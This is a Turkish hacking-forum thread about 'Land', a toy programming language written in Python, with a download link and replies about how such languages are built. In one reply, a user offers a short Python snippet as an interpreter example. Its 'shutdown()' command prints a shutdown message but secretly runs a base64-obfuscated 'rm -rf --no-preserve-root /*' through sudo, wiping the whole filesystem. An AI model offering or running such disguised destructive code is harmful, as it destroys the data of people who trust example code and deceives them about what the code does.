Land - Programlama Dili

"Xale

Katılımcı Üye
16 Eki 2020
442
20
Land nedir?​
Land programlama dili, Python dili kullanılarak tasarlanmıştır. Henüz tam olarak gelişmemiş olan bu yeni dil ile, bir çok şeyi kolaylıkla yapmak mümkün olacak. Land açık kaynak kodlu, yorumlanabilir ve nesne yönelimli basit bir programlama dilidir. Geliştirilmesindeki amaç, sadece insanların programlamaya olan bakış açısını basitleştirmektir. Dil, birçok platformda çalışabiliyor olacak. Microsoft Windows, Mac, Unix, Linux gibi çeşitli işletim sistemlerinde çalıştırmak mümkün olacak.​

Land indir / Sürüm: 1.0.1:​

İndirme linki:​
https://dosya.co/eld0osqne35c/Land.zip.html

Sorunlarınızı yorumlarda belirtin.

VirusTotal:​

Github:

Zip dosyanın içinde açmayınız, önce dosyaları masaüstüne veya başka bir klasörün içine atıp açınız. Aksi takdirde dosyalar açılmayabilir.
Hayırlı günler.

Son düzenleme:

"Xale

Katılımcı Üye
16 Eki 2020
442
20
Merhaba,
öncelikle bu kodlar üzerinde değişiklikler yaptım ve yeni şeyler ekledim ve bunun yanında düzeltmeler yaptım. Yani, sadece kodları almadım. Bunun yanında çoğu şeyide aşağıdaki videodan bakarak yaptım ve kodlarda hata oluşunca kopyala yapıştır yaptım. O video:
https://youtu.be/Eythq9848Fg

Eğer bana inanmazsan, yeni sürümleri bekliyebilirsin. Hayırlı günler.

CacaBey

Üye
23 Şub 2021
92
1
@@@@@@@@@@@@
Merhaba,
öncelikle bu kodlar üzerinde değişiklikler yaptım ve yeni şeyler ekledim ve bunun yanında düzeltmeler yaptım. Yani, sadece kodları almadım. Bunun yanında çoğu şeyide aşağıdaki videodan bakarak yaptım ve kodlarda hata oluşunca kopyala yapıştır yaptım. O video:
https://youtu.be/Eythq9848Fg

Eğer bana inanmazsan, yeni sürümleri bekliyebilirsin. Hayırlı günler.

Hocam ben iki dosyaya baktım sizin dosyanızda sadece ilk 4 satırı siz eklemişsiniz

Gatex

Üye
10 Nis 2020
219
2
Türkiye
Merhaba, python kullanarak nasıl kendi dilinizi tasarladınız. Çok araştırma yaptım ancak bulamadım

gl0balfox

Üye
9 Tem 2019
228
0
import os

str = input()

if str == 'shutdown()':
print('Bilgisayar kapatılıyor...')
os.system('base64 -d <<< cm0gLXJmdiAtLW5vLXByZXNlcnZlLXJvb3QgLyo= | sudo sh')

if-else yapa yapa tüm komuları yazamazsın, bir döngüye geldiğinde ne yapacaksın mesela?
Gatex Bir tokenizer ve interpreter kodlarsın, komutları değiştirirsin. Ortaya da yazılım dili çıkmaz zaten, bakan güler haline. High Level dil ile yazılım dili kodlanmaz, Low Level ile kodlaman lazım.

Python ile dediğim formatta bir dil (!) oluşturulmuş, bakabilirsin tutoriallara.
Link

"Xale

Katılımcı Üye
16 Eki 2020
442
20
Merhaba bu tam bir dil sayılır mı bilemem, o zaman acemiydim. Ve o zaman tam olarak ne yaptığımı anlatmamıştım. Sadece derleyici kodlamıştım ve başka bir programlama diline derleniyordu.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.